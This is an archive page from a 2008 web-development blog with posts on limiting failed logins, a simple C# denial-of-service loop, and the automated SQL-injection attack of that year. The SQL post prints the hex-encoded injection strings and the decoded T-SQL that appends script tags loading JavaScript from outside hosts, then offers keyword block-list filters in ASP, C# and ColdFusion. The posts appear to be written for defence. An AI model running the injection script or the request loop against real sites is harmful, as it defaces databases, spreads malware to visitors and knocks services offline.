Archive for the ‘Dos’ Tag

Prevent spontaneously attempted login attack

Posted September 30, 2008
Filed under: coldfusion | Tags: , ,
* Leave a Comment

Sometimes, most of our websites have been attacked by spontaneously attempted login attack by bots. That’s why we gotta prevent anyone cannot do like that in our web application. Fortunately, it’s very simple to do in ColdFusion. Here is coding…

<cfif session.FailedLogin GT 3>

<cfabort message=”Sorry.! Please contact website administrator to get your password.”>

</cfif>
<cfif loginsuccessfully ….>

Write your code here

<cfelse>

<cfparam name=”session.FailedLogin” default=”0″>
<cfset session.FailedLogin = session.FailedLogin+1>
<cfabort message=”Invalid Username and password”>

</cfif>

Make simple DOS attach with ASP.NET

Posted September 30, 2008
Filed under: ASP.NET #C | Tags: , ,
* Leave a Comment

I’ve describe how to make simple DOS attack with Asp.Net. My purpose of writing this thread isn’t to annoy web administrator. My point is how to prevent Dos attack and how to abort Dos attack for our website.

for( int i = 0; i < 100000; i ++ )
{
WebClient client = new WebClient();
client.DownloadString(”http://www.mysite.com”);
}

SQL Injection attacks by Store Procedure

Posted August 23, 2008
Filed under: MSSQL, coldfusion | Tags: , ,
* Comments(3)

I was in dilemma in these days because our website has been attacked by SQL Injection Attacks by the way of using store procedure command in URL variable. Finally, I can prevent this one cannot attack to our site by using like that anymore. The one use following store procedure command the after “?” of your website URL.

DECLARE @S NVARCHAR(4000)
SET @S=CAST(0x4400450043004C00 ... 6F007200 AS NVARCHAR(4000))
EXEC(@S)

DECLARE @S VARCHAR(4000)
SET @S=CAST(0x4445434C41524520 ... 736F7220 AS VARCHAR(4000))
EXEC(@S)

DECLARE @S CHAR(4000)
SET @S=CAST(0x4445434C41524520 ... 736F7220 AS CHAR(4000))
EXEC(@S)

The above three variants have been injected through an HTTP GET:

Decoding the binary string to its textual form reveals the T-SQL script below, which has been slightly formatted and edited for purposes of clarity. For those who are not proficient in the syntax, the script simply creates a cursor through which it browses for all columns of certain data types (textual) in all user-defined tables underlying the database. Next, the T-SQL script affixes a JavaScript reference (to the malicious script) to the current values contained in each such column.

DECLARE @T VARCHAR(255)
DECLARE @C VARCHAR(255)

DECLARE Table_Cursor CURSOR FOR
SELECT [A].[Name], [B].[Name]
FROM sysobjects AS [A], syscolumns AS [B]
WHERE [A].[ID] = [B].[ID] AND

[A].[XType] = ‘U’ /* Table (User-Defined) */ AND
([B].[XType] = 99 /* NTEXT */ OR
[B].[XType] = 35 /* TEXT */ OR
[B].[XType] = 231 /* NVARCHAR */ OR
[B].[XType] = 167 /* VARCHAR */)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C

WHILE (@@FETCH_STATUS = 0)

BEGIN
EXEC(‘UPDATE [' + @T + '] SET [' + @C + '] = RTRIM(CONVERT(VARCHAR, [' + @C + '])) + ”<script src=”http://winzipices.cn/2.js”></script>”’)
FETCH NEXT FROM Table_Cursor INTO @T, @C
END

CLOSE Table_Cursor
DEALLOCATE Table_Cursor

WHILE (@@FETCH_STATUS = 0)

BEGIN
EXEC(‘UPDATE [' + @T + '] SET [' + @C + ']=[' + @C + ']+””></title><script src=”http://abc.verynx.cn/w.js”></script><!–” where ‘ + @C + ‘ not like ”%”></title><script src=”http://abc.verynx.cn/w.js”></script><!–”’)
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
Additionally, the SQL script terminates enclosing <title> HTML tag in order to download and execution of the maliciously injected Javascript code. This approach specifically targets web pages that dynamically populate their title tag from the database. Finally, the SQL terminates the injection with a comment declaration “<!–”, intentionally trying to hide or prevent the rendering of the HTML content to follow.

How to Prevent Such Automated SQL Injection Attacks

In ASP and Asp.net, we don’t need to prevent with so many nested coding. Here is coding for protecting SQL Injection Attack for ASP and ASP.NET C#.

<%

Dim strQuery
strQuery = UCase(Request.ServerVariables(”QUERY_STRING”))
strQuery = Replace(URLDecode(strQuery), ” “, “”)
InStr(strQuery,”INSERT”) > 0 OR _
If InStr(strQuery,”EXEC(”) > 0 OR _
InStr(strQuery,”SELECT”) > 0 OR _
InStr(strQuery,”UPDATE”) > 0 OR _
InStr(strQuery,”DELETE”) > 0 OR _
Len(strQuery) > 500 Then
Response.Write 1/0
End If
%>
/// <summary>
/// global.asax
/// </summary>
public class Global : System.Web.HttpApplication
{
private static string[] SQLKeywords = new string[]
{
“EXEC”, “SELECT”, “INSERT”, “UPDATE”, “DELETE”,
“CAST”, “DECLARE”, “NVARCHAR”, “VARCHAR”
};
protected void Application_BeginRequest(object sender, EventArgs e)
{
HttpContext context = HttpContext.Current;
if (context != null)
{
string queryString =
context.Request.ServerVariables["QUERY_STRING"];
if (string.IsNullOrEmpty(queryString) == false)
{
if (queryString.Length > 500)
throw new SQLInjectionException(string.Format(“Unexpected ‘QUERY_STRING’ length ({0}).”, queryString));

queryString = Server.UrlDecode(queryString);

queryString =
queryString.Replace(” “, string.Empty).ToUpper();
foreach (string keyword in SQLKeywords)
{
if (queryString.IndexOf(keyword) != (-1))
throw new SQLInjectionException(string.Format(“Unexpected T-SQL keyword (’{0}’) has been detected ({1})”, keyword, queryString));
}
}
}
}

}

For ColdFusion MX, we need to put following coding in application.cfm file.

<cfsilent>
<!—
name: _SQLPrev.cfm
desc: Helps Prevent SQL Injection Attacks (CF5).
author: Justin D. Scott of GravityFree (jscott@gravityfree.com)
date: November 7, 2005
update: August 7, 2008
notes:DIRECTIONS
Include this in the Application.cfm file to help prevent SQL injection attacks.
Compatible with ColdFusion 5 and may also work with ColdFusion MX. There is
an MX specific version at http://www.gravityfree.com/_sqlprev.cfm.txt.
If you update this code to be more effective, please send a copy of the changes
back to me so they can be implemented more widely.

DISCLAIMER
Justin Scott and GravityFree make no representation about the suitability or
accuracy of software or data for any purpose, and makes no warranties, either
expressed or implied, including merchantability and fitness for a particular
purpose or that the use of these software or data will not infringe any third
party patents, copyrights, trademarks, or other rights. The software and data
are provided “as is”. Use at your own risk.

LICENSE
This code is hereby released into the public domain.
—>

<!— E-Mail address for attack notifications —>
<cfparam name=“request.errorEmail” default=me@yourdomain.com />

<!— On attack, TRUE to abort FALSE to redirect to rootURL —>
<cfparam name=“request.errorAbort” default=“FALSE” />

<!— On attack, TRUE to notify via e-mail —>
<cfparam name=“request.errorNotify” default=“TRUE” />

<!— Redirection URL —>
<cfparam name=“request.rootURL” default=“/” />

<cfscript>
// Default to nothing. variables.SQLPrev_Found = “”;

// What are the SQL Keywords? variables.SQLPrev_Keywords = structNew();

// Populate the structure. structInsert(variables.SQLPrev_Keywords, “EXEC”, “”);
structInsert(variables.SQLPrev_Keywords, “ALTER”, “”);
structInsert(variables.SQLPrev_Keywords, “EXECUTE”, “”);
structInsert(variables.SQLPrev_Keywords, “PROC”, “”);
structInsert(variables.SQLPrev_Keywords, “ASC”, “”);
structInsert(variables.SQLPrev_Keywords, “FILE”, “”);
structInsert(variables.SQLPrev_Keywords, “PROCEDURE”, “”);
structInsert(variables.SQLPrev_Keywords, “AUTHORIZATION”, “”);
structInsert(variables.SQLPrev_Keywords, “BACKUP”, “”);
structInsert(variables.SQLPrev_Keywords, “RAISERROR”, “”);
structInsert(variables.SQLPrev_Keywords, “FOREIGN”, “”);
structInsert(variables.SQLPrev_Keywords, “FREETEXT”, “”);
structInsert(variables.SQLPrev_Keywords, “READTEXT”, “”);
structInsert(variables.SQLPrev_Keywords, “BREAK”, “”);
structInsert(variables.SQLPrev_Keywords, “FREETEXTTABLE”, “”);
structInsert(variables.SQLPrev_Keywords, “RECONFIGURE”, “”);
structInsert(variables.SQLPrev_Keywords, “BROWSE”, “”);
structInsert(variables.SQLPrev_Keywords, “REFERENCES”, “”);
structInsert(variables.SQLPrev_Keywords, “BULK”, “”);
structInsert(variables.SQLPrev_Keywords, “FULL”, “”);
structInsert(variables.SQLPrev_Keywords, “REPLICATION”, “”);
structInsert(variables.SQLPrev_Keywords, “FUNCTION”, “”);
structInsert(variables.SQLPrev_Keywords, “RESTORE”, “”);
structInsert(variables.SQLPrev_Keywords, “CASCADE”, “”);
structInsert(variables.SQLPrev_Keywords, “GOTO”, “”);
structInsert(variables.SQLPrev_Keywords, “RESTRICT”, “”);
structInsert(variables.SQLPrev_Keywords, “GRANT”, “”);
structInsert(variables.SQLPrev_Keywords, “RETURN”, “”);
structInsert(variables.SQLPrev_Keywords, “CHECK”, “”);
structInsert(variables.SQLPrev_Keywords, “GROUP”, “”);
structInsert(variables.SQLPrev_Keywords, “REVOKE”, “”);
structInsert(variables.SQLPrev_Keywords, “CHECKPOINT”, “”);
structInsert(variables.SQLPrev_Keywords, “HAVING”, “”);
structInsert(variables.SQLPrev_Keywords, “RIGHT”, “”);
structInsert(variables.SQLPrev_Keywords, “CLOSE”, “”);
structInsert(variables.SQLPrev_Keywords, “HOLDLOCK”, “”);
structInsert(variables.SQLPrev_Keywords, “ROLLBACK”, “”);
structInsert(variables.SQLPrev_Keywords, “CLUSTERED”, “”);
structInsert(variables.SQLPrev_Keywords, “IDENTITY”, “”);
structInsert(variables.SQLPrev_Keywords, “ROWCOUNT”, “”);
structInsert(variables.SQLPrev_Keywords, “COALESCE”, “”);
structInsert(variables.SQLPrev_Keywords, “IDENTITY_INSERT”, “”);
structInsert(variables.SQLPrev_Keywords, “ROWGUIDCOL”, “”);
structInsert(variables.SQLPrev_Keywords, “COLLATE”, “”);
structInsert(variables.SQLPrev_Keywords, “IDENTITYCOL”, “”);
structInsert(variables.SQLPrev_Keywords, “COLUMN”, “”);
structInsert(variables.SQLPrev_Keywords, “COMMIT”, “”);
structInsert(variables.SQLPrev_Keywords, “SCHEMA”, “”);
structInsert(variables.SQLPrev_Keywords, “COMPUTE”, “”);
structInsert(variables.SQLPrev_Keywords, “INDEX”, “”);
structInsert(variables.SQLPrev_Keywords, “SELECT”, “”);
structInsert(variables.SQLPrev_Keywords, “CONSTRAINT”, “”);
structInsert(variables.SQLPrev_Keywords, “INNER”, “”);
structInsert(variables.SQLPrev_Keywords, “SESSION_USER”, “”);
structInsert(variables.SQLPrev_Keywords, “CONTAINS”, “”);
structInsert(variables.SQLPrev_Keywords, “INSERT”, “”);
structInsert(variables.SQLPrev_Keywords, “SET”, “”);
structInsert(variables.SQLPrev_Keywords, “CONTAINSTABLE”, “”);
structInsert(variables.SQLPrev_Keywords, “INTERSECT”, “”);
structInsert(variables.SQLPrev_Keywords, “SETUSER”, “”);
structInsert(variables.SQLPrev_Keywords, “CONTINUE”, “”);
structInsert(variables.SQLPrev_Keywords, “INTO”, “”);
structInsert(variables.SQLPrev_Keywords, “SHUTDOWN”, “”);
structInsert(variables.SQLPrev_Keywords, “CONVERT”, “”);
structInsert(variables.SQLPrev_Keywords, “CREATE”, “”);
structInsert(variables.SQLPrev_Keywords, “JOIN”, “”);
structInsert(variables.SQLPrev_Keywords, “STATISTICS”, “”);
structInsert(variables.SQLPrev_Keywords, “CROSS”, “”);
structInsert(variables.SQLPrev_Keywords, “KEY”, “”);
structInsert(variables.SQLPrev_Keywords, “SYSTEM_USER”, “”);
structInsert(variables.SQLPrev_Keywords, “CURRENT”, “”);
structInsert(variables.SQLPrev_Keywords, “KILL”, “”);
structInsert(variables.SQLPrev_Keywords, “TABLE”, “”);
structInsert(variables.SQLPrev_Keywords, “CURRENT_DATE”, “”);
structInsert(variables.SQLPrev_Keywords, “LEFT”, “”);
structInsert(variables.SQLPrev_Keywords, “TEXTSIZE”, “”);
structInsert(variables.SQLPrev_Keywords, “CURRENT_TIME”, “”);
structInsert(variables.SQLPrev_Keywords, “LIKE”, “”);
structInsert(variables.SQLPrev_Keywords, “THEN”, “”);
structInsert(variables.SQLPrev_Keywords, “CURRENT_TIMESTAMP”, “”);
structInsert(variables.SQLPrev_Keywords, “LINENO”, “”);
structInsert(variables.SQLPrev_Keywords, “CURRENT_USER”, “”);
structInsert(variables.SQLPrev_Keywords, “LOAD”, “”);
structInsert(variables.SQLPrev_Keywords, “TOP”, “”);
structInsert(variables.SQLPrev_Keywords, “CURSOR”, “”);
structInsert(variables.SQLPrev_Keywords, “NATIONAL”, “”);
structInsert(variables.SQLPrev_Keywords, “TRAN”, “”);
structInsert(variables.SQLPrev_Keywords, “DATABASE”, “”);
structInsert(variables.SQLPrev_Keywords, “NOCHECK”, “”);
structInsert(variables.SQLPrev_Keywords, “TRANSACTION”, “”);
structInsert(variables.SQLPrev_Keywords, “DBCC”, “”);
structInsert(variables.SQLPrev_Keywords, “NONCLUSTERED”, “”);

structInsert(variables.SQLPrev_Keywords, “TRIGGER”, “”);
structInsert(variables.SQLPrev_Keywords, “DEALLOCATE”, “”);
structInsert(variables.SQLPrev_Keywords, “TRUNCATE”, “”);
structInsert(variables.SQLPrev_Keywords, “DECLARE”, “”);
structInsert(variables.SQLPrev_Keywords, “NULL”, “”);
structInsert(variables.SQLPrev_Keywords, “TSEQUAL”, “”);
structInsert(variables.SQLPrev_Keywords, “DEFAULT”, “”);
structInsert(variables.SQLPrev_Keywords, “NULLIF”, “”);
structInsert(variables.SQLPrev_Keywords, “UNION”, “”);
structInsert(variables.SQLPrev_Keywords, “DELETE”, “”);
structInsert(variables.SQLPrev_Keywords, “UNIQUE”, “”);
structInsert(variables.SQLPrev_Keywords, “DENY”, “”);
structInsert(variables.SQLPrev_Keywords, “OFF”, “”);
structInsert(variables.SQLPrev_Keywords, “UPDATE”, “”);
structInsert(variables.SQLPrev_Keywords, “DESC”, “”);
structInsert(variables.SQLPrev_Keywords, “OFFSETS”, “”);
structInsert(variables.SQLPrev_Keywords, “UPDATETEXT”, “”);
structInsert(variables.SQLPrev_Keywords, “DISK”, “”);
structInsert(variables.SQLPrev_Keywords, “USE”, “”);
structInsert(variables.SQLPrev_Keywords, “DISTINCT”, “”);
structInsert(variables.SQLPrev_Keywords, “OPEN”, “”);
structInsert(variables.SQLPrev_Keywords, “USER”, “”);
structInsert(variables.SQLPrev_Keywords, “DISTRIBUTED”, “”);
structInsert(variables.SQLPrev_Keywords, “OPENDATASOURCE”, “”);
structInsert(variables.SQLPrev_Keywords, “VALUES”, “”);
structInsert(variables.SQLPrev_Keywords, “DOUBLE”, “”);
structInsert(variables.SQLPrev_Keywords, “OPENQUERY”, “”);
structInsert(variables.SQLPrev_Keywords, “VARYING”, “”);
structInsert(variables.SQLPrev_Keywords, “DROP”, “”);
structInsert(variables.SQLPrev_Keywords, “OPENROWSET”, “”);
structInsert(variables.SQLPrev_Keywords, “VIEW”, “”);
structInsert(variables.SQLPrev_Keywords, “DUMMY”, “”);
structInsert(variables.SQLPrev_Keywords, “OPENXML”, “”);
structInsert(variables.SQLPrev_Keywords, “WAITFOR”, “”);
structInsert(variables.SQLPrev_Keywords, “DUMP”, “”);
structInsert(variables.SQLPrev_Keywords, “OPTION”, “”);
structInsert(variables.SQLPrev_Keywords, “WHEN”, “”);
structInsert(variables.SQLPrev_Keywords, “WHERE”, “”);
structInsert(variables.SQLPrev_Keywords, “END”, “”);
structInsert(variables.SQLPrev_Keywords, “ORDER”, “”);
structInsert(variables.SQLPrev_Keywords, “WHILE”, “”);
structInsert(variables.SQLPrev_Keywords, “ERRLVL”, “”);
structInsert(variables.SQLPrev_Keywords, “OUTER”, “”);
structInsert(variables.SQLPrev_Keywords, “WITH”, “”);
structInsert(variables.SQLPrev_Keywords, “ESCAPE”, “”);
structInsert(variables.SQLPrev_Keywords, “OVER”, “”);
structInsert(variables.SQLPrev_Keywords, “WRITETEXT”, “”);

// Now check through the URL variables for possible SQL attacks. for (SQLPrev_Index1 in URL) {
// Bring in the URL value. variables.SQLPrev_Value = URL[SQLPrev_Index1];
// Find any of the keywords in this value. for (SQLPrev_Index2 in variables.SQLPrev_Keywords) {
if (findNoCase(SQLPrev_Index2, variables.SQLPrev_Value) and find(“;”, variables.SQLPrev_Value)) {
variables.SQLPrev_Found = “sql”;
}
}
}

// Kill the temp struct with the SQL keywords. structClear(variables.SQLPrev_Keywords);

</cfscript>

<!— Did we find anything? —>
<cfif len(variables.SQLPrev_Found)>

<!— E-Mail the error for tracking. —>
<cfif request.errorNotify>
<cfmail to=“#request.errorEmail#” from=“#request.errorEmail#” subject=“SQL Injection Attempt” type=“HTML”>
<p>Date: #now()#</p>
<p>Site: #cgi.server_name#</p>
<p>URL: #cgi.script_name#?#cgi.query_string#</p>
<p>IP: #cgi.remote_addr#</p>
<cfdump var=“#url#”>
<cfdump var=“#variables#”>
</cfmail>
</cfif>

<!— Abort or redirect to home. —>
<cfif request.ErrorAbort>
<cfabort>
<cfelse>
<cflocation url=“#request.rootURL#” addtoken=“no”>
</cfif>

</cfif>

</cfsilent>

Big thanks to the author writing such following CFM coding. Because of this coding, I can prevent anybody cannot use SQL injection attack to our website.
Big Credit to :
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-AutomatedSQL-Injection.aspx
http://www.shareddynamics.com/index.cfm/2008/8/11/SQL-Injection-attacks